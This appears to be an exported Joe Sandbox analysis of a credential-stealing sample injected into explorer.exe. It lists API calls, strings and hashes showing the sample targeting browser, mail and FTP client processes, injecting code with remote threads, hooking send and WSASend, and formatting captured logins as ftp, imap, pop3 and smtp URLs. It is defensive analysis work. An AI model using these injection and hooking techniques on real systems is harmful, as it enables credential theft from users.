                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                        • Instruction ID: d2b0416f8d2dd8bd6224af6b249c26280dae660d7f0a6161c980e368c1a016b5
                        • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                        • Instruction Fuzzy Hash: FEF08234318F094FAB44EF7C9C8C535B7E0EBA8202B04867E985AC7164EF34C8808711

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00CA1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1D1D
                          • Part of subcall function 00CA1D08: Process32First.KERNEL32 ref: 00CA1D3C
                          • Part of subcall function 00CA1D08: FindCloseChangeNotification.KERNELBASE ref: 00CA1D74
                          • Part of subcall function 00CA1D08: lstrcmpi.KERNEL32 ref: 00CA1D4C
                          • Part of subcall function 00CA1D08: Process32Next.KERNEL32 ref: 00CA1D67
                        • SleepEx.KERNEL32 ref: 00CA4952
                          • Part of subcall function 00CA1EB4: FindFirstFileW.KERNELBASE ref: 00CA1F05
                          • Part of subcall function 00CA1EB4: FindNextFileW.KERNELBASE ref: 00CA1F7C
                          • Part of subcall function 00CA1EB4: FindClose.KERNELBASE ref: 00CA1F89
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2126623357.0000000000CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CA1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_ca1000_explorer.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirstNextProcess32$ChangeCreateNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 2273424085-0
                        • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                        • Instruction ID: 5691494e7e344ea6175097afb0ec127694d4cf5068bc447d20e542ba799520ce
                        • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                        • Instruction Fuzzy Hash: 5231D731608A194FDB59FF68E8995EA73E2FB99301F14462EE84BC31A1DE38990187C0

                        Execution Graph

                        Execution Coverage: 10.3%
                        Dynamic/Decrypted Code Coverage: 97.4%
                        Signature Coverage: 0%
                        Total number of Nodes: 306
                        Total number of Limit Nodes: 42


                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00841016); the API calls it makes are listed below.
                        APIs
                          • Part of subcall function 00842608: VirtualQuery.KERNEL32(00844434,?,0000001C), ref: 00842615
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00841038
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0084106B
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00841074
                        • GetCurrentProcessId.KERNEL32(?,00841010), ref: 0084107A
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008410DF
                        • Process32First.KERNEL32(00000000,?), ref: 008410FE
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0084111A
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0084112E
                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00841142
                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00841156
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00841166
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0084117A
                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0084118E
                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008411A2
                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008411B6
                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008411CA
                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008411DE
                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008411F2
                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00841206
                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00841216
                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00841226
                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00841236
                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00841246
                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00841256
                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00841266
                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00841276
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008412B4
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0084130B
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0084131C
                        • Sleep.KERNELBASE(000003E8), ref: 00841327
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateChangeCloseCreateCurrentFindFirstNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                        • API String ID: 831104905-1680033604
                        • Opcode ID: 28253ab8c2e0301946c7c4f0e194f82c8de3ad6c92c270dda1c5fb32c90eec75
                        • Instruction ID: b3dc20cd59b085491b3965de9c1cb2a9e761fb56e66bbb99d849fa569cb54b83
                        • Opcode Fuzzy Hash: 28253ab8c2e0301946c7c4f0e194f82c8de3ad6c92c270dda1c5fb32c90eec75
                        • Instruction Fuzzy Hash: 5071903060535DABCF10DFB19C49E6A7BACFF46780B04062AF950C3291EB69DA45CB75

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008410DF
                        • Process32First.KERNEL32(00000000,?), ref: 008410FE
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0084111A
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0084112E
                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00841142
                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00841156
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00841166
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0084117A
                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0084118E
                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 008411A2
                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 008411B6
                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 008411CA
                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 008411DE
                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 008411F2
                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00841206
                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00841216
                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00841226
                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00841236
                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00841246
                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00841256
                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00841266
                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00841276
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 008412B4
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0084130B
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0084131C
                        • Sleep.KERNELBASE(000003E8), ref: 00841327
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcmpi$HeapProcess32$AllocateChangeCloseCreateFindFirstNextNotificationProcessSleepSnapshotToolhelp32
                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                        • API String ID: 2875627700-1680033604
                        • Opcode ID: 896528b9abd725dc7435f72b794d3bd64b1d0c6a0a548d0bf553207c367413b4
                        • Instruction ID: 982d65fee869243ccbb05fb858c07044b437a62aa65cb691aa8b8edaed0e4183
                        • Opcode Fuzzy Hash: 896528b9abd725dc7435f72b794d3bd64b1d0c6a0a548d0bf553207c367413b4
                        • Instruction Fuzzy Hash: 96517F7160531DA6DF10DFB19C89E6E7AECFF45B80B440A29FA50C3280EB68DA458B75

                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00847728; calls LoadLibraryA, GetProcAddress and VirtualProtect).
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000846000.00000040.80000000.00040000.00000000.sdmp, Offset: 00846000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_846000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9842741880f68e25a47fc16def667095c992e361676a6f1cde9e26b328523cf
                        • Instruction ID: e9c382edd5b00a824a24a2c7bf7e31cfde7537f12781fd6494817f61f17731c0
                        • Opcode Fuzzy Hash: e9842741880f68e25a47fc16def667095c992e361676a6f1cde9e26b328523cf
                        • Instruction Fuzzy Hash: D3514B7194D39A4FD7218A78CC846B07BA0FB52324B6D0779C5E5CB3C2E7985C0AC7A4

                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00842861, a single block 00842861-00842871); the API calls it makes are listed below.
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 2af3da6543ca2deb25f8ab857207552876eb7584ffc9ed1cd4ebd6a56340588e
                        • Instruction ID: d61d8de7671698927f8d7eb1b37a6a3969220c3b896c0e37d749415cb664cb9e
                        • Opcode Fuzzy Hash: 2af3da6543ca2deb25f8ab857207552876eb7584ffc9ed1cd4ebd6a56340588e
                        • Instruction Fuzzy Hash: 99A002755506407FDD5567E4AD0DF553A19B756701F0046447149C5060D964554CCB21

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842608: VirtualQuery.KERNEL32(00844434,?,0000001C), ref: 00842615
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0084184E
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00841889
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00841919
                        • RtlMoveMemory.NTDLL(00000000,00843428,00000016), ref: 00841940
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00841968
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00841978
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00841992
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0084199A
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008419A8
                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 008419AF
                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 008419C5
                        • GetProcAddress.KERNEL32(00000000), ref: 008419CC
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 008419E2
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00841A0C
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00841A1F
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A26
                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A2D
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00841A41
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00841A58
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A65
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A6B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00841A71
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00841A74
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                        • API String ID: 1066286714-4141090125
                        • Opcode ID: c55329491cefd6df84dcf8b8d030416542cbc786431ed443cde7bb6a4112c05d
                        • Instruction ID: 22d778017a9cba7ce5a6f3a698cb6c4265aa3f4fdb2be14800952c0ba917526e
                        • Opcode Fuzzy Hash: c55329491cefd6df84dcf8b8d030416542cbc786431ed443cde7bb6a4112c05d
                        • Instruction Fuzzy Hash: E2617A35205318AFD710DF659C88E6BBBECFF8A754F000629F949D2251DB74DA44CBA2

                        Control-flow Graph

                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0084265A
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00842672
                        • lstrlen.KERNEL32(?,00000000), ref: 0084267A
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00842685
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0084269F
                        • wsprintfA.USER32 ref: 008426B6
                        • CryptDestroyHash.ADVAPI32(?), ref: 008426CF
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 008426D9
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: a898373607de22621ab75b5b1a44eeb075fa2c389e596f048c4f460461edc530
                        • Instruction ID: 7da94eef6088f8223d2b1253aa1bee5951320e4fbfc7e1bbeaa2d43ee7dfee74
                        • Opcode Fuzzy Hash: a898373607de22621ab75b5b1a44eeb075fa2c389e596f048c4f460461edc530
                        • Instruction Fuzzy Hash: CC1128B590050CBFDB119B99EC88EAEBFBCFB49741F1041A5F605E2160E6718F01DB60

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0084109E,?,00841010), ref: 0084134A
                        • GetCurrentProcessId.KERNEL32(00000003,?,0084109E,?,00841010), ref: 0084135B
                        • wsprintfA.USER32 ref: 00841372
                          • Part of subcall function 0084263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0084265A
                          • Part of subcall function 0084263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00842672
                          • Part of subcall function 0084263E: lstrlen.KERNEL32(?,00000000), ref: 0084267A
                          • Part of subcall function 0084263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00842685
                          • Part of subcall function 0084263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0084269F
                          • Part of subcall function 0084263E: wsprintfA.USER32 ref: 008426B6
                          • Part of subcall function 0084263E: CryptDestroyHash.ADVAPI32(?), ref: 008426CF
                          • Part of subcall function 0084263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 008426D9
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00841389
                        • GetLastError.KERNEL32 ref: 0084138F
                        • Sleep.KERNEL32(000001F4), ref: 008413A1
                          • Part of subcall function 008424D5: GetCurrentProcessId.KERNEL32 ref: 008424E7
                          • Part of subcall function 008424D5: GetCurrentThreadId.KERNEL32 ref: 008424EF
                          • Part of subcall function 008424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008424FF
                          • Part of subcall function 008424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0084250D
                          • Part of subcall function 008424D5: CloseHandle.KERNEL32(00000000), ref: 00842566
                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 008413B8
                        • GetProcAddress.KERNEL32(00000000), ref: 008413BF
                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 008413E4
                        • GetProcAddress.KERNEL32(00000000), ref: 008413EB
                          • Part of subcall function 00841DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00841E1D
                        • RtlExitUserThread.NTDLL(00000000), ref: 0084141D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                        • API String ID: 706757162-1430290102
                        • Opcode ID: 02147c28de80bb72a11092e2c4495b70b29e67f6d2d1ccf48b7116c9274322a9
                        • Instruction ID: 1125d3f3f0b86674e3c91009c6f6644668cbe478975ffe8d3caf4f1d62af9582
                        • Opcode Fuzzy Hash: 02147c28de80bb72a11092e2c4495b70b29e67f6d2d1ccf48b7116c9274322a9
                        • Instruction Fuzzy Hash: 6E31843434461CBBCF106FA4DD0EB5E3A56FF16B42F104124F606D7291DBB58A51CB95

                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00841647; calls lstrlen, getpeername, inet_ntoa, htons and wsprintfA).
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                        • API String ID: 3379139566-1703351401
                        • Opcode ID: 1e4eefa89471c2f31c3ce2ceb13be3039e2253725c546222576a89006512035c
                        • Instruction ID: 703623b1cab992424af7d191cacd9fda73074489a93dba7a8d377c0749a11de4
                        • Opcode Fuzzy Hash: 1e4eefa89471c2f31c3ce2ceb13be3039e2253725c546222576a89006512035c
                        • Instruction Fuzzy Hash: BC21B036E0021DABDF115FED8D8C5BEBAA9FB45301B184175E904E3219DA34CE80DA60

                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00841752); the API calls it makes are listed below.
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00841539,?,?,?,0084144B,?), ref: 00841763
                        • GetProcAddress.KERNEL32(00000000), ref: 0084176A
                        • RtlZeroMemory.NTDLL(00844228,00000104), ref: 00841788
                        • RtlZeroMemory.NTDLL(00844118,00000104), ref: 00841790
                        • RtlZeroMemory.NTDLL(00844330,00000104), ref: 00841798
                        • RtlZeroMemory.NTDLL(00844000,00000104), ref: 008417A1
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryZero$AddressHandleModuleProc
                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                        • API String ID: 1490332519-278825019
                        • Opcode ID: 9200d4eeb42cbf76a925679dcab49e8aa0e65580488cdbf63a139dbbba187b77
                        • Instruction ID: 194b5354edae629d6f11bd5447cd15b99c63d73864ac891fb46b58de81e1613e
                        • Opcode Fuzzy Hash: 9200d4eeb42cbf76a925679dcab49e8aa0e65580488cdbf63a139dbbba187b77
                        • Instruction Fuzzy Hash: 24F08932780B3C33812023EA7C0AE47BD5CF656FE63121256B624E3341D9DD690085B4

                        Control-flow Graph

                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 008424E7
                        • GetCurrentThreadId.KERNEL32 ref: 008424EF
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008424FF
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0084250D
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0084252C
                        • SuspendThread.KERNEL32(00000000), ref: 0084253C
                        • CloseHandle.KERNEL32(00000000), ref: 0084254B
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0084255B
                        • CloseHandle.KERNEL32(00000000), ref: 00842566
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 9fbcfd9087edad87a787056e34c6b3d155ab37fbc34445c3bc3ea2784a458d51
                        • Instruction ID: e4f265c31358e20bc663ca0511806d6f58bfceec35002e2de97a93da304e540b
                        • Opcode Fuzzy Hash: 9fbcfd9087edad87a787056e34c6b3d155ab37fbc34445c3bc3ea2784a458d51
                        • Instruction Fuzzy Hash: 17115BB5408709EFD7119F60AC4CB6EBBA8FF9A745F050629FA41D2150D7308A49CBA2

                        Control-flow Graph

                        • Graph rendering not reproduced (interactive export of function 00841F4A); the API calls it makes are listed below.
                        APIs
                          • Part of subcall function 00842861: GetProcessHeap.KERNEL32(00000008,0000A000,008410CC), ref: 00842864
                          • Part of subcall function 00842861: RtlAllocateHeap.NTDLL(00000000), ref: 0084286B
                          • Part of subcall function 008427E2: lstrlen.KERNEL32(008440DA,?,00000000,00000000,00841F86,74DE8A60,008440DA,00000000), ref: 008427EA
                          • Part of subcall function 008427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,008440DA,00000001,00000000,00000000), ref: 008427FC
                          • Part of subcall function 00842374: RtlZeroMemory.NTDLL(?,00000018), ref: 00842386
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00841FE2
                        • wsprintfW.USER32 ref: 0084211B
                        • wsprintfW.USER32 ref: 00842186
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00842250
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 2f95c48a99e7d14d6a223a4477863cc2ae069489d3a940a52a358053ad6a6454
                        • Instruction ID: 23fae729af151f0f8081b3d5af900eeb8766516ac3d6d0bba521e045922d4fe5
                        • Opcode Fuzzy Hash: 2f95c48a99e7d14d6a223a4477863cc2ae069489d3a940a52a358053ad6a6454
                        • Instruction Fuzzy Hash: C7A15975608309AFD710DF68D885A2FBBE8FB89344F50492DF985D3361EA74DA04CB62

                        Control-flow Graph

                        control_flow_graph 366 8425ad-8425c9 OpenProcess 367 842600-842607 366->367 368 8425cb-8425da IsWow64Process 366->368 369 8425f7 368->369 370 8425dc-8425ec IsWow64Process 368->370 372 8425f9-8425fa CloseHandle 369->372 371 8425ee-8425f5 370->371 370->372 371->372 372->367
                        APIs
                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00841287), ref: 008425BF
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 008425D1
                        • IsWow64Process.KERNEL32(00000000,?), ref: 008425E4
                        • CloseHandle.KERNEL32(00000000), ref: 008425FA
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID: microsoftedgecp.exe
                        • API String ID: 331459951-1475183003
                        • Opcode ID: 7b0470eb3ae1f6509283da227d8a2b956f0b6e1a9f12d5da7da08cca6ee6f114
                        • Instruction ID: 9a058b0a66b76446a28faca04038522ef2daddfa113f8f0493fbadb98f65cab3
                        • Opcode Fuzzy Hash: 7b0470eb3ae1f6509283da227d8a2b956f0b6e1a9f12d5da7da08cca6ee6f114
                        • Instruction Fuzzy Hash: 5DF0547594662CFF9B10DF949D988EEB76CFF02355B55036AF904D2140D7314F04E6A4

                        Control-flow Graph

                        control_flow_graph 421 841b17-841b2c 422 841b60-841b68 421->422 423 841b2e 421->423 425 841bc3-841bcb 422->425 426 841b6a-841b6f 422->426 424 841b30-841b5e RtlMoveMemory 423->424 424->422 424->424 427 841bcd-841bdf 425->427 428 841c0b 425->428 429 841bbe-841bc1 426->429 427->428 430 841be1-841bfe LdrProcessRelocationBlock 427->430 431 841c0d-841c12 428->431 429->425 432 841b71-841b84 LoadLibraryA 429->432 430->428 433 841c00-841c04 430->433 434 841c15-841c17 432->434 435 841b8a-841b8f 432->435 433->428 436 841c06-841c09 433->436 434->431 437 841bb6-841bb9 435->437 436->428 436->430 438 841b91-841b95 437->438 439 841bbb 437->439 440 841b97-841b9a 438->440 441 841b9c-841b9f 438->441 439->429 442 841ba1-841bab GetProcAddress 440->442 441->442 442->434 443 841bad-841bb3 442->443 443->437
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00841B4E
                        • LoadLibraryA.KERNEL32(?,00844434,00000000,00000000,74DF2EE0,00000000,00841910,?,?,?,00000001,?,00000000), ref: 00841B76
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00841BA3
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00841BF4
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Offset: 00841000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_841000_explorer.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
